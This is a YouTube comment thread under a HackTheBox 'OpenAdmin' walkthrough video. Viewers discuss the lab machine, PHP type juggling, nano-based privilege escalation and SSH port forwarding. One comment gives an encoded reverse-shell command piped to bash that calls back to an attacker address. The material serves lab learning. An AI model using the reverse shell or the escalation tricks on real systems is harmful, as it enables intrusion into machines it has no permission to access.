HackTheBox - OpenAdmin

แชร์
ฝัง
  • เผยแพร่เมื่อ 20 ธ.ค. 2024

ความคิดเห็น • 108

  • @geeshta
    @geeshta 4 ปีที่แล้ว +72

    Normal people: "How do I exit vim?"
    Ippsec: "How do I exit nano?" xD
    Anyways, great vid as always, thanks!

    • @XDAHACKS
      @XDAHACKS 4 ปีที่แล้ว

      😂😂

    • @kristibegaj608
      @kristibegaj608 4 ปีที่แล้ว +1

      He was trying to escape to a shell not exit 😒

    • @dnzzzl4853
      @dnzzzl4853 4 ปีที่แล้ว +7

      @@kristibegaj608 congratulations you pointed out the joke

  • @alexterrats9909
    @alexterrats9909 4 ปีที่แล้ว +34

    The reason why the hash thing wasn't working was because on the php script both hashes were strings when being compared, so == just performs a regular string comparison just like ===
    If you had compared "0" == "00e123asd" insted of 0 == "00e123asd" it wouldn't have evaluated to true either
    Thank you for the video

    • @jigerjain
      @jigerjain 4 ปีที่แล้ว +1

      Alex Terrats Type Juggling right :)

  • @MKVD
    @MKVD 4 ปีที่แล้ว +10

    First box I ever rooted. Nice to see something relatively more "easy" in HTB

  • @jigerjain
    @jigerjain 4 ปีที่แล้ว

    The vulnerability you were trying to exploit with ‘==‘ and ‘===‘ was type juggling. If you would tried comparing integer with string then it would have bypassed like comparing 0 with “00e3eekfkhfk” as you showed on your php interactive shell. Effectively sending 0 {integer} instead of “Revealed” {string} would have bypassed the check with “==“. Thanks for the video! The way you tackle the bumps is simply awesome :)

  • @SunilSathyanarayan
    @SunilSathyanarayan 4 ปีที่แล้ว +3

    Learned a lot from the video, thank you so much for your work.
    Solving box live without preparation is a lot more better, and helps me get better at recon.

  • @lucasrodriguez3795
    @lucasrodriguez3795 4 ปีที่แล้ว +22

    movies: Show a hacker using 3 terminals at the same time to hack anything
    people: Thats not real, there too much information at the same time.
    IppSec: Uses 3 terminals at the same time
    people: Wait thats illegal

    • @orlaani1451
      @orlaani1451 3 ปีที่แล้ว +1

      There are no matrixes running so he did it wrong :D

  • @baron3831
    @baron3831 2 ปีที่แล้ว

    this guy has the best htb videos at youtube.
    best explanations, i just love it.
    thank u for ur time, dont stop! :D

  • @Rac00n
    @Rac00n 4 ปีที่แล้ว +4

    Well rip more points. Lovely video. I leaned a lot from you in the past year. Thank you

  • @philiplunderquist8826
    @philiplunderquist8826 4 ปีที่แล้ว

    Finally rooted this box myself, took me 5hours but it's done :)
    Been looking forward to watch your approach on this one!

  • @ertertz9408
    @ertertz9408 4 ปีที่แล้ว +8

    watching you forget something else with the reverse shell everytime you tried was hillarious lol

    • @kristibegaj608
      @kristibegaj608 4 ปีที่แล้ว

      That thing was funny 🤣🤣🤣

  • @nicoswd
    @nicoswd 4 ปีที่แล้ว +12

    john not autocompleting the wordlist path on pressing tab always drives me mad. I figured that putting a space after the equal fixes this
    --wordlist= /usr/share/seclists/...

  • @Jonathan-hw7fy
    @Jonathan-hw7fy 4 ปีที่แล้ว

    Very nice box ! The reason that allows apache to access joanna's home directory is a virtual host rule, which gives temporary rights to apache as joanna. I was actually curious about it too, and finally figured it out.
    Nicely done and thank you for this content, keep up the good work !

    • @berndeckenfels
      @berndeckenfels 4 ปีที่แล้ว

      Does it use suidcgi?

    • @ManuelMuradas
      @ManuelMuradas 4 ปีที่แล้ว +1

      I thought it was because the file had gid 'internal' and the apache process run as gid 'internal' too.

  • @RaduPopescu000
    @RaduPopescu000 4 ปีที่แล้ว

    The type confusion or type juggling or what ever you want to call it seems to have been fixed in the sense that if you compare two strings that start with a digit, it will only compare them as numbers as long as their numeric representation and string representation are equal (so, '0e2' is treated as a number, but '0ea' is not). This is not the case when comparing a number to a string: in this case it will just read until it encounters an invalid character for a number, and cast the read part as a number and then compare to the other side.
    If you look closely at 1:00:00 "0" == "0e1idsa" does not work, but 0 == "0e1idsa" works.
    Just in case anyone was curios.

  • @ursr78122
    @ursr78122 4 ปีที่แล้ว

    Great job dude, one of the best for writeups and all that stuff. It was my first machine from HTB, but with tons of hints and help... You are doing the best job for explaining things.

  • @kegnsec
    @kegnsec 4 ปีที่แล้ว +2

    hah! I was also confused when curling without authentication/credentials gave the key! Thank you for walking through that

  • @comradedragoGaming
    @comradedragoGaming 4 ปีที่แล้ว +3

    at 48:20 I cant get the ~C to do anything is that the exact keys or am I missing something ? cant get the ssh command line to load.

  • @Cullinan000
    @Cullinan000 4 ปีที่แล้ว +1

    Hello everyone. Even though I don't understand much, I am finding these videos absolutely fascinating. I would really love to learn this. What learning path would you suggest? I have some coding experience (Python, VBA, SQL, nothing fancy). I was thinking of starting with networking and Linux. I also found this thing called CTF, which seems very fun. Looking forward to all your comments. Cheers!

    • @PabloSilva-ph6mk
      @PabloSilva-ph6mk 4 ปีที่แล้ว +3

      Learning network and linux will help pretty much. There are quite good websites to practice beside HTB (tryhackme, vulnhub)
      Try hack is much more beginner friendly. HTB has some easier machines, but to do most of the "easier's" boxes you will need to buy VIP.
      I started to learn a lot when I tried to actually do the machines, I take notes on everything and always keep searching.
      Good luck!

  • @oblivionronin
    @oblivionronin 4 ปีที่แล้ว

    23:38, you had forgot to start-up nc again thats all. Great video again dude, GG

  • @jdbjdb2
    @jdbjdb2 4 ปีที่แล้ว

    Top tier hacker. The website is protected. He says this website is horrible. Website gives the password

  • @sakettestsakettest8009
    @sakettestsakettest8009 4 ปีที่แล้ว +6

    The one whom i have not seen but i am glad to have him as my mentor 🙏.This man has deep impact on my life honestly.

  • @Haxr-dq6wt
    @Haxr-dq6wt 4 ปีที่แล้ว +1

    Ipp the word great is not enough to describe you.
    You are the best out their to explain these stuff.
    Will you ever make a Udemy course about pentesting or something like that?

  • @orlaani1451
    @orlaani1451 3 ปีที่แล้ว

    As I watching these videos I start to feel that I should start pentest.

  • @gelules
    @gelules 4 ปีที่แล้ว

    If you want to privesc nano, look for the man:
    You have the '--speller' option, which call a program to check for spelling mistakes. You can set bash to be the program to check, then execute "ctrl+t" in nano to execute the speller, and boom, you get a bash with root privilege :)
    The website root-me got a great challenge for privilege escalation, it's called "bash - restricted shells" in the "app-script" challenges.

  • @applemac5193
    @applemac5193 2 ปีที่แล้ว

    Good work! At 48:20 what command did to execute to get into SSH command mode?

    • @ippsec
      @ippsec  2 ปีที่แล้ว

      ~C

  • @withinonezero1174
    @withinonezero1174 4 ปีที่แล้ว +1

    The webserver serving the main.php is actually owned by joanna, so you could have avoided cracking the passphrase of the private certificate and have directly a joanna shell. The reason the process doesn't show up when you run ps could be that you don't have full access to information about processes you don't have access to (similar to what happens with netstat [which actually shows you such a message])

  • @allenxd
    @allenxd 4 ปีที่แล้ว

    love this ippsec! Thanks! This was my first box :D

  • @TheErixcode
    @TheErixcode 3 ปีที่แล้ว

    @IppSec 24:00 first you didn't ran the python3, then you forgot to listen to nc, for the bash I think you should specified the /bin/bash

  • @b3twiise853
    @b3twiise853 4 ปีที่แล้ว

    Thanks for 47:31. First time i did the box, i just curled it easy. Second time, not so much

  • @gvrkrishna4857
    @gvrkrishna4857 4 ปีที่แล้ว +2

    I wish I could understand like you...I know it isn't something that comes over-night...I am beginner for this CTF and boxes...Any suggestions on how to build all the concepts I need to root the boxes?

    • @PinkDraconian
      @PinkDraconian 4 ปีที่แล้ว +2

      HTB probably isn't the place to actually learn new concepts but more for reinforcing them. I like TryHackMe for actually learning new things.

  • @susnoname
    @susnoname 3 ปีที่แล้ว

    ~c or ~C gives me command not found :/
    I did local port forwarding in my Kali (via ssh) but I am curious why the method from ippsec's video does not work on htb machine?

  • @hv55maser
    @hv55maser 4 ปีที่แล้ว

    Awesome man, great box too🔥⚡

  • @westernvibes1267
    @westernvibes1267 4 ปีที่แล้ว +5

    People's are really spoiling the boxes too much. I mean leaving the exploits and all are fine. But i found the root's id_rsa private key on tmp folder in forwardslash.😂 No wonder someone did that on purpose cuz that box doesn't have anything like reading files to get root.

    • @ippsec
      @ippsec  4 ปีที่แล้ว +1

      What do you mean? You can escape out of nano and get rood :)

    • @عبداللهالهيبي-س3ح
      @عبداللهالهيبي-س3ح 4 ปีที่แล้ว

      This is the best thing in hack the box 😂😂😂

    • @thev01d12
      @thev01d12 4 ปีที่แล้ว

      @@ippsec he is saying about the forwardslash box i guess 🙄

    • @madcuntmcgee1955
      @madcuntmcgee1955 4 ปีที่แล้ว

      I don't think someone did that on purpose, that key needed to be mounted. which is not much of a spoiler I hope, @IppSec please remove my comment if you feel otherwise

  • @omran.alshehabi
    @omran.alshehabi 4 ปีที่แล้ว +3

    You're awesome 🔥

  • @Ms.Robot.
    @Ms.Robot. 4 ปีที่แล้ว +2

    I was going to watch The Matrix, but now that I found this, I'm watching this instead! Now let me get my popcorn and rootbeer! 💗 🍿

  • @rohitthakur.9587
    @rohitthakur.9587 3 ปีที่แล้ว

    How do u get ssh command mode? ( 48:27 )

  • @bradleytough
    @bradleytough 4 ปีที่แล้ว

    I can't get the SSH local port forward to work. Squiggly + C doesn't cut the mustard for me. It hurts my brain. How did you authenticate the connection? I currently believe you are local port forwarding on the OpenAdmin box right? On the OpenAdmin box you are saying if anything comes in on 9002 > send it to > 52846. When then back on your client does local host work for you rather than 10.10.10.171:9002?

  • @MrMeLaX
    @MrMeLaX 4 ปีที่แล้ว

    Thank you. You doing awesome work.

  • @bugeyemonster
    @bugeyemonster 4 ปีที่แล้ว +1

    not gonna watch it , already solved this box, but its still live, i did think it was allowed to post guides for live boxes, well maybe i should watch i am sure i will learn something new your videos are great

    • @ippsec
      @ippsec  4 ปีที่แล้ว +4

      Personally, I watch other videos/read writeups on boxes that I solved, because I love seeing what people did different and if their approach was any better. This box retired today, boxes retire 4 hours prior to the weekly release, so people can learn from the retired machine while waiting for the new machine to be launched.

    • @bugeyemonster
      @bugeyemonster 4 ปีที่แล้ว +1

      @@ippsec cool i love your videos i have been using them as part of my prep for oscp which is on monday, any boxes you would suggest going through at the last minute?

    • @thev01d12
      @thev01d12 4 ปีที่แล้ว +1

      @@bugeyemonster imo you shouldn't be just racing through boxes if your oscp is on monday. Chill out and go through your notes if you have solved tj null's oscp list and can solve hackthebox's active boxes by your own you are good to go. Just make sure you identify the bad characters well in buffer overflow :p or you would be wasting a lot of time. Oscp exam isn't really that hard if you are ready. Good luck !!

    • @thev01d12
      @thev01d12 4 ปีที่แล้ว +1

      @@bugeyemonster hackthebox's easy-medium boxes*

    • @bugeyemonster
      @bugeyemonster 4 ปีที่แล้ว

      @@thev01d12 sound advice :)

  • @illusioniser
    @illusioniser 4 ปีที่แล้ว

    So I was doing the same thing to get a proper reverse shell from the single command shell, I tried to upload a python rev shell file, but I did it using wget and it didn't work, but after watching this video, trying it with curl works, any idea why?

  • @ChhailengPeng
    @ChhailengPeng 4 ปีที่แล้ว

    At 17:19 base64 did work, but because of cURL did this by passing that on URL, URL encoding is needed. I did this ===> echo%20YmFzaCAtYyAnYmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNC4yLzkwMDEgMD4mMSc%3d|base64%20-d|bash

  • @whitefighter5928
    @whitefighter5928 3 ปีที่แล้ว

    How we are searching inside the linPEAS?

  • @servermadum7297
    @servermadum7297 ปีที่แล้ว +1

    hello,
    hoca can ı search output terminal? have it si short key?

  • @noahw9183
    @noahw9183 4 ปีที่แล้ว

    Anyone recommend what to do if when you run linpeas on the server nothing happens?

    • @Ffreeze90
      @Ffreeze90 4 ปีที่แล้ว

      piped it to bash?
      x.x.x.x/linpeas.sh | bash

  • @ellerionsnow3340
    @ellerionsnow3340 ปีที่แล้ว

    Perl reverse shell works as well.

  • @kostas9813
    @kostas9813 4 ปีที่แล้ว

    you are the best keep it up!!!!!!

  • @maxvc2330
    @maxvc2330 4 ปีที่แล้ว

    your videos are great!

  • @ivena
    @ivena 4 ปีที่แล้ว

    Good work but not like usual, got headache :))

  • @thecast9864
    @thecast9864 4 ปีที่แล้ว

    i spent like 20 hours trying to root this and still failed, can anybody tell me if it gets easier, and if so how long does it take?

  • @darthvader7212
    @darthvader7212 2 ปีที่แล้ว

    URL encoding worked for me as reverse shell option with bash command

  • @nios1515
    @nios1515 4 ปีที่แล้ว

    Many people rooted the box only from www-data shell and skipping the user. Anyone knows how?
    Thank you for the video.

  • @harshitmashru1754
    @harshitmashru1754 4 ปีที่แล้ว +3

    Is this actually easy😥??

    • @user-sl7oz1fh1s
      @user-sl7oz1fh1s 4 ปีที่แล้ว +4

      To be fair, OpenAdmin is on the 'harder' end of easy. This box didn't require huge amounts of technical skill. It more required familiarly with a number of things: linux; linux commands to sift through all the information a user can access; ports, and when a port is doing something 'suspicious'.
      I personally find that Linux machines on HTB are always that bit more difficult than they are otherwise rated to be. If you're looking for easy machines, I'd recommend attacking Windows machines that are rated easy, as they seem to be more accurate.
      Don't feel disheartened if you're just starting out and watch videos like this either. IppSec is so good at what he does that he does EASY boxes his own HARD way, so we can learn alternative methods.

    • @gvrkrishna4857
      @gvrkrishna4857 4 ปีที่แล้ว +2

      @@user-sl7oz1fh1s This is exactly what I was looking for as I am a beginner and tried for like 2 days for this box and just got a shell...failed to locate the ssh key....here I was seeing all the comments saying "easy" and got discouraged but after you're message...I think I don't know it yet.(Will get better soon:)

    • @harshitmashru1754
      @harshitmashru1754 4 ปีที่แล้ว

      @@user-sl7oz1fh1s Thanks for the advice man

  • @adityakrishna6817
    @adityakrishna6817 4 ปีที่แล้ว

    why not just use the metasploit payload ??

    • @Ffreeze90
      @Ffreeze90 4 ปีที่แล้ว +1

      if you do the OSCP, you are not allowed to use msf - also its much smarter to understand the concept, than using finished scripts :)

  • @my_key
    @my_key 4 ปีที่แล้ว

    Omg are those points gone as well? How do you guys ever get to thousands of points?

  • @priyanshukumarpu
    @priyanshukumarpu 4 ปีที่แล้ว

    There will be no Saturday Livestream? 🙁

    • @ippsec
      @ippsec  4 ปีที่แล้ว +3

      Nope. No real motivation to do livestreams anymore, using the time to work on some personal projects that I don't want to be public.

    • @priyanshukumarpu
      @priyanshukumarpu 4 ปีที่แล้ว +2

      @@ippsec kind of sad for me . But, wishing luck for your project 🤗

  • @tyrewald9083
    @tyrewald9083 4 ปีที่แล้ว

    Great stuff!

  • @real1cytv
    @real1cytv 4 ปีที่แล้ว

    This was my first root own :)

  • @thev01d12
    @thev01d12 4 ปีที่แล้ว

    How come john and hashcat couldn't crack that sha512 but a website had it. Smh

    • @ippsec
      @ippsec  4 ปีที่แล้ว

      I believe it’s how the hash is being shown. Ie sha512sum looked to be about half the length, so I’m guessing it’s being shown in hex form.

  • @j93040921
    @j93040921 4 ปีที่แล้ว

    totally dont understand why this was classified as an EASY box!

  • @djebbaranon5892
    @djebbaranon5892 4 ปีที่แล้ว

    Sorry for that potato English
    Guys I hope you can help me
    I m working on a box I got access as daemon but I don't have bash shell I wasn't able to get reverse shell at all
    But I was able to upload php webshell the version of the kernel is too outdated and I have the creds of user and this user have bash shell
    The problem is I don't know how to run my local exploit without getting reverse shell
    Also ssh is closed so I can't login as user
    BUT I FOUND something interesting MySQL have bash shell ..
    Please can you help me guys

  • @ameer2942
    @ameer2942 3 ปีที่แล้ว

    57:26 🤣🤣

  • @cry6270
    @cry6270 4 ปีที่แล้ว

    I hacked the box in one shot, in about 40 mins or less and I am a dummie lol, congrat me:(

  • @AhmedAbdullah-pp2mp
    @AhmedAbdullah-pp2mp 4 ปีที่แล้ว

    awesome

  • @benasin1724
    @benasin1724 4 ปีที่แล้ว

    Haha at 23:30 you didn't listen with netcat.

    • @ippsec
      @ippsec  4 ปีที่แล้ว +2

      Ha. Thankfully, it didn't delay me too much. Was disappointed I forgot about URL Encoding, figured curl would do a good enough job. That alone would have shortened the video by like 20 minutes. Oh well, still would have gotten the bloods if I could compete :).

    • @benasin1724
      @benasin1724 4 ปีที่แล้ว

      @@ippsec 😂😂😂😂

  • @ronaldjonson8240
    @ronaldjonson8240 4 ปีที่แล้ว

    Lol I spent 3hrs down a rabbit hole exploit

  • @il2626
    @il2626 4 ปีที่แล้ว

    It was eZ peZ tbh

  • @darshanakhare6676
    @darshanakhare6676 4 ปีที่แล้ว

    Do sauna

  • @pratiksawant8119
    @pratiksawant8119 4 ปีที่แล้ว +2

    First Comment first like 😁

  • @LarryTheRoleplayerTM
    @LarryTheRoleplayerTM 4 ปีที่แล้ว

    Watching you not being able to type simple commands is brutal. It seems you're just blindly poking at boxes and hoping to get lucky. Most of the time you're just fucking things up or missing info because you're going too fast.

  • @CurrentlyObsessively
    @CurrentlyObsessively 4 ปีที่แล้ว

    47:57 tbh... showing how an exploit is found/why it works is all cool. When you go into explaining how they "should" have stopped it you are going beyond scope and length for this video. Thumbs down.

    • @ippsec
      @ippsec  4 ปีที่แล้ว +7

      What good is knowing how to exploit things, if you don't also know how to prevent it? A pentest report that just shows vulnerabilities and no detailed information on how to prevent it is pretty meaningless. If the video is too long for you because of this information, just use the timestamps in the description to jump to the next chapter.

    • @CurrentlyObsessively
      @CurrentlyObsessively 4 ปีที่แล้ว +1

      @@ippsec I guess I'm just a complainer. I didn't really give it a thumbs down either way. xD